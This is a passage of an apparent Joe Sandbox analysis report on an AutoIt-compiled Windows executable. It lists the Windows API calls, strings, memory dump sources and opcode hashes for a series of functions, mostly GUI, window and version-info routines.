                                                    • Opcode Fuzzy Hash: 303d126beee475d2b40e222042536e705cb7077af3a05917908440e2f5dd724b
                                                    • Instruction Fuzzy Hash: 8FA1BC72408305BFD7519F64DC08AAF7BA9FF88331F544A1AF966961A0DB30D848EF52
                                                    APIs
                                                    • DestroyWindow.USER32(?,?,?), ref: 00EF3072
                                                    • DeleteObject.GDI32(00000000), ref: 00EF30B8
                                                    • DeleteObject.GDI32(00000000), ref: 00EF30C3
                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00EF30CE
                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00EF30D9
                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F2C77C
                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F2C7B5
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F2CBDE
                                                      • Part of subcall function 00EF1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00EF2412,?,00000000,?,?,?,?,00EF1AA7,00000000,?), ref: 00EF1F76
                                                    • SendMessageW.USER32(?,00001053), ref: 00F2CC1B
                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F2CC32
                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00F2CC48
                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00F2CC53
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                    • String ID: 0
                                                    • API String ID: 464785882-4108050209
                                                    • Opcode ID: d7639ec2b97b308587e1309a94b5c8b77010c9c739c40d09ea841617ce8e8e10
                                                    • Instruction ID: d9f056d23a6be64f8e05e6ed068fa0005d4ddd9d5ddeec0baf0215ba0ebd2022
                                                    • Opcode Fuzzy Hash: d7639ec2b97b308587e1309a94b5c8b77010c9c739c40d09ea841617ce8e8e10
                                                    • Instruction Fuzzy Hash: DF129D30A00215EFDB24CF24D894BB9BBE1BF48310F54856AE685DB262CB31ED45EF91
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                    • API String ID: 2660009612-1645009161
                                                    • Opcode ID: 7c130a3103552b7a874e97d3c30e20975f84dbd6a219b65dc9abde9e319a2513
                                                    • Instruction ID: dce3fb956c3f382de4941825be38c427645b14306155f2d017f252b200894451
                                                    • Opcode Fuzzy Hash: 7c130a3103552b7a874e97d3c30e20975f84dbd6a219b65dc9abde9e319a2513
                                                    • Instruction Fuzzy Hash: 47A1BF31E40209ABCB54AF20CD86EBE7BA9AF45750F044029F805AB2D2EB74DE45F761
                                                    APIs
                                                    • DestroyWindow.USER32(00000000), ref: 00F67BC8
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F67C87
                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00F67CC5
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00F67CD7
                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00F67D1D
                                                    • GetClientRect.USER32(00000000,?), ref: 00F67D29
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00F67D6D
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F67D7C
                                                    • GetStockObject.GDI32(00000011), ref: 00F67D8C
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00F67D90
                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00F67DA0
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F67DA9
                                                    • DeleteDC.GDI32(00000000), ref: 00F67DB2
                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F67DDE
                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00F67DF5
                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00F67E30
                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F67E44
                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00F67E55
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00F67E85
                                                    • GetStockObject.GDI32(00000011), ref: 00F67E90
                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F67E9B
                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00F67EA5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                    • API String ID: 2910397461-517079104
                                                    • Opcode ID: 34beed7c8ec2ff587b869b27f01cd4c00bb6d215b14ab54757955542d85a91ef
                                                    • Instruction ID: 34f2d823a68d3d98c643dbcad7de6ab6cd8ee843315ee03d6c9c02e3fb497359
                                                    • Opcode Fuzzy Hash: 34beed7c8ec2ff587b869b27f01cd4c00bb6d215b14ab54757955542d85a91ef
                                                    • Instruction Fuzzy Hash: C1A160B1A00619BFEB14DB64DC8AFBE7BA9EB44710F004214FA15A72E0DB70AD04DF64
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 00F5B361
                                                    • GetDriveTypeW.KERNEL32(?,00F82C4C,?,\\.\,00F80980), ref: 00F5B43E
                                                    • SetErrorMode.KERNEL32(00000000,00F82C4C,?,\\.\,00F80980), ref: 00F5B59C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DriveType
                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                    • API String ID: 2907320926-4222207086
                                                    • Opcode ID: 12c0501794d38170d60ca63408fb7b90417ea0beaa70108c80de8da90a43a34b
                                                    • Instruction ID: d7876b72197381c317da4d5578b39ceb95435a675b189dd38a81068c8d3578b3
                                                    • Opcode Fuzzy Hash: 12c0501794d38170d60ca63408fb7b90417ea0beaa70108c80de8da90a43a34b
                                                    • Instruction Fuzzy Hash: 5E51D471B4020DEBC714DF20CD42ABD77A0AB45392F284015FE06A7692E775EE89FB52
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00F7A0F7
                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00F7A1B0
                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 00F7A1CC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: 0
                                                    • API String ID: 2326795674-4108050209
                                                    • Opcode ID: 133d3314bb867439dabe3c18aa67257a8dca2e4025bc85f2055830fd1ec325f4
                                                    • Instruction ID: 542eee46934c30e00eac8206a2a63dbb5d8d3f775431062dd3578b1ab704e441
                                                    • Opcode Fuzzy Hash: 133d3314bb867439dabe3c18aa67257a8dca2e4025bc85f2055830fd1ec325f4
                                                    • Instruction Fuzzy Hash: 1D02DA31508200AFEB15CF14C848BAEBBE5FF85324F09851AF999962A1CB75D854EF53
                                                    APIs
                                                    • GetSysColor.USER32(00000012), ref: 00F7AF51
                                                    • SetTextColor.GDI32(?,?), ref: 00F7AF55
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00F7AF6B
                                                    • GetSysColor.USER32(0000000F), ref: 00F7AF76
                                                    • CreateSolidBrush.GDI32(?), ref: 00F7AF7B
                                                    • GetSysColor.USER32(00000011), ref: 00F7AF93
                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F7AFA1
                                                    • SelectObject.GDI32(?,00000000), ref: 00F7AFB2
                                                    • SetBkColor.GDI32(?,00000000), ref: 00F7AFBB
                                                    • SelectObject.GDI32(?,?), ref: 00F7AFC8
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00F7AFE7
                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F7AFFE
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00F7B013
                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F7B05F
                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F7B086
                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00F7B0A4
                                                    • DrawFocusRect.USER32(?,?), ref: 00F7B0AF
                                                    • GetSysColor.USER32(00000011), ref: 00F7B0BD
                                                    • SetTextColor.GDI32(?,00000000), ref: 00F7B0C5
                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F7B0D9
                                                    • SelectObject.GDI32(?,00F7AC1F), ref: 00F7B0F0
                                                    • DeleteObject.GDI32(?), ref: 00F7B0FB
                                                    • SelectObject.GDI32(?,?), ref: 00F7B101
                                                    • DeleteObject.GDI32(?), ref: 00F7B106
                                                    • SetTextColor.GDI32(?,?), ref: 00F7B10C
                                                    • SetBkColor.GDI32(?,?), ref: 00F7B116
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 1996641542-0
                                                    • Opcode ID: 18c8281dc56947c1de183952ac86222da2586824d67c9ef384089dae9285d0ab
                                                    • Instruction ID: f5b64808da691ca393300e7cd1156097113134895701b0c64b887e2bc0e08887
                                                    • Opcode Fuzzy Hash: 18c8281dc56947c1de183952ac86222da2586824d67c9ef384089dae9285d0ab
                                                    • Instruction Fuzzy Hash: 42617B72D00218AFDF119FA4DC48EEE7B79EF08320F118116F919AB2A1DB759944EF90
                                                    APIs
                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F790EA
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F790FB
                                                    • CharNextW.USER32(0000014E), ref: 00F7912A
                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F7916B
                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F79181
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F79192
                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F791AF
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00F791FB
                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F79211
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F79242
                                                    • _memset.LIBCMT ref: 00F79267
                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F792B0
                                                    • _memset.LIBCMT ref: 00F7930F
                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F79339
                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F79391
                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00F7943E
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00F79460
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F794AA
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F794D7
                                                    • DrawMenuBar.USER32(?), ref: 00F794E6
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00F7950E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                    • String ID: 0
                                                    • API String ID: 1073566785-4108050209
                                                    • Opcode ID: 16a01449e6a62f6d82cbaa1ebd3fbc55e54aafe16fd56210e7e623516b10e1c9
                                                    • Instruction ID: a92cb7be2ad9a92d0547c5c006ecde39e4dbf3666936f8bc1936d285a38c4394
                                                    • Opcode Fuzzy Hash: 16a01449e6a62f6d82cbaa1ebd3fbc55e54aafe16fd56210e7e623516b10e1c9
                                                    • Instruction Fuzzy Hash: 67E1A371904218AFDF11DF60CC84EFE7BB8EF05720F14815AF919AA191DBB48A85EF52
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 00F75007
                                                    • GetDesktopWindow.USER32 ref: 00F7501C
                                                    • GetWindowRect.USER32(00000000), ref: 00F75023
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F75085
                                                    • DestroyWindow.USER32(?), ref: 00F750B1
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F750DA
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F750F8
                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F7511E
                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00F75133
                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F75146
                                                    • IsWindowVisible.USER32(?), ref: 00F75166
                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F75181
                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F75195
                                                    • GetWindowRect.USER32(?,?), ref: 00F751AD
                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00F751D3
                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00F751ED
                                                    • CopyRect.USER32(?,?), ref: 00F75204
                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00F7526F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                    • String ID: ($0$tooltips_class32
                                                    • API String ID: 698492251-4156429822
                                                    • Opcode ID: e5d7d8cb68b655617f126e87e00d96474755767ec0a12fc8a684223f776be79a
                                                    • Instruction ID: c9914310cc6b826266502c2d4f026b8931af579fc84779281e5b4ab16e5a1648
                                                    • Opcode Fuzzy Hash: e5d7d8cb68b655617f126e87e00d96474755767ec0a12fc8a684223f776be79a
                                                    • Instruction Fuzzy Hash: F2B17B71604741AFDB44DF64C844B6BBBE4BF88710F008A1DF59DAB291DBB1E805DB92
                                                    APIs
                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00F5499C
                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00F549C2
                                                    • _wcscpy.LIBCMT ref: 00F549F0
                                                    • _wcscmp.LIBCMT ref: 00F549FB
                                                    • _wcscat.LIBCMT ref: 00F54A11
                                                    • _wcsstr.LIBCMT ref: 00F54A1C
                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00F54A38
                                                    • _wcscat.LIBCMT ref: 00F54A81
                                                    • _wcscat.LIBCMT ref: 00F54A88
                                                    • _wcsncpy.LIBCMT ref: 00F54AB3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                    • API String ID: 699586101-1459072770
                                                    • Opcode ID: 8d01c07d9e77b71c6eea1c77101c0c69425497a5372f5627c554f80fefa12cd0
                                                    • Instruction ID: d0a2296d0b6ea3293c0cb169acdc5969a80fad9e34b98aa56167f4fba826567f
                                                    • Opcode Fuzzy Hash: 8d01c07d9e77b71c6eea1c77101c0c69425497a5372f5627c554f80fefa12cd0
                                                    • Instruction Fuzzy Hash: FE410B72A042047AD751BB608C47EFF776CDF45720F000059FE04A6193EB38EA9577A6
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EF2C8C
                                                    • GetSystemMetrics.USER32(00000007), ref: 00EF2C94
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EF2CBF
                                                    • GetSystemMetrics.USER32(00000008), ref: 00EF2CC7
                                                    • GetSystemMetrics.USER32(00000004), ref: 00EF2CEC
                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00EF2D09
                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00EF2D19
                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00EF2D4C
                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00EF2D60
                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00EF2D7E
                                                    • GetStockObject.GDI32(00000011), ref: 00EF2D9A
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00EF2DA5
                                                      • Part of subcall function 00EF2714: GetCursorPos.USER32(?), ref: 00EF2727
                                                      • Part of subcall function 00EF2714: ScreenToClient.USER32(00FB77B0,?), ref: 00EF2744
                                                      • Part of subcall function 00EF2714: GetAsyncKeyState.USER32(00000001), ref: 00EF2769
                                                      • Part of subcall function 00EF2714: GetAsyncKeyState.USER32(00000002), ref: 00EF2777
                                                    • SetTimer.USER32(00000000,00000000,00000028,00EF13C7), ref: 00EF2DCC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                    • String ID: AutoIt v3 GUI
                                                    • API String ID: 1458621304-248962490
                                                    • Opcode ID: 244c25d81e97d7d31e2d132dfd9eeb75c5a02a4bc7421c80c046ceaf5d99d764
                                                    • Instruction ID: 0d405f5cd1f7c510b798c9e90da78453e41d3ff23cd48791e42beaea8edc1535
                                                    • Opcode Fuzzy Hash: 244c25d81e97d7d31e2d132dfd9eeb75c5a02a4bc7421c80c046ceaf5d99d764
                                                    • Instruction Fuzzy Hash: FDB13D75A0020E9FDB14DFA8DC95BFE77A4FB48314F204219FA15A6290DB74A850DF54
                                                    APIs
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                    • GetForegroundWindow.USER32(00F80980,?,?,?,?,?), ref: 00F104E3
                                                    • IsWindow.USER32(?), ref: 00F466BB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$Foreground_memmove
                                                    • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                    • API String ID: 3828923867-1919597938
                                                    • Opcode ID: 58ff781370d2ee06e3771d67709eb9dcf1c8c8f6b6d195c5ade0909ae4adbc7f
                                                    • Instruction ID: 934b3da8c1bc886e7fe18f26c5037a904950581ccfc8181b5073a242676456ea
                                                    • Opcode Fuzzy Hash: 58ff781370d2ee06e3771d67709eb9dcf1c8c8f6b6d195c5ade0909ae4adbc7f
                                                    • Instruction Fuzzy Hash: 03D1D471504202DBCB04EF20C8819EABFB5BF56354F144A19F855872A2DF34F999FB92
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 00F744AC
                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F7456C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
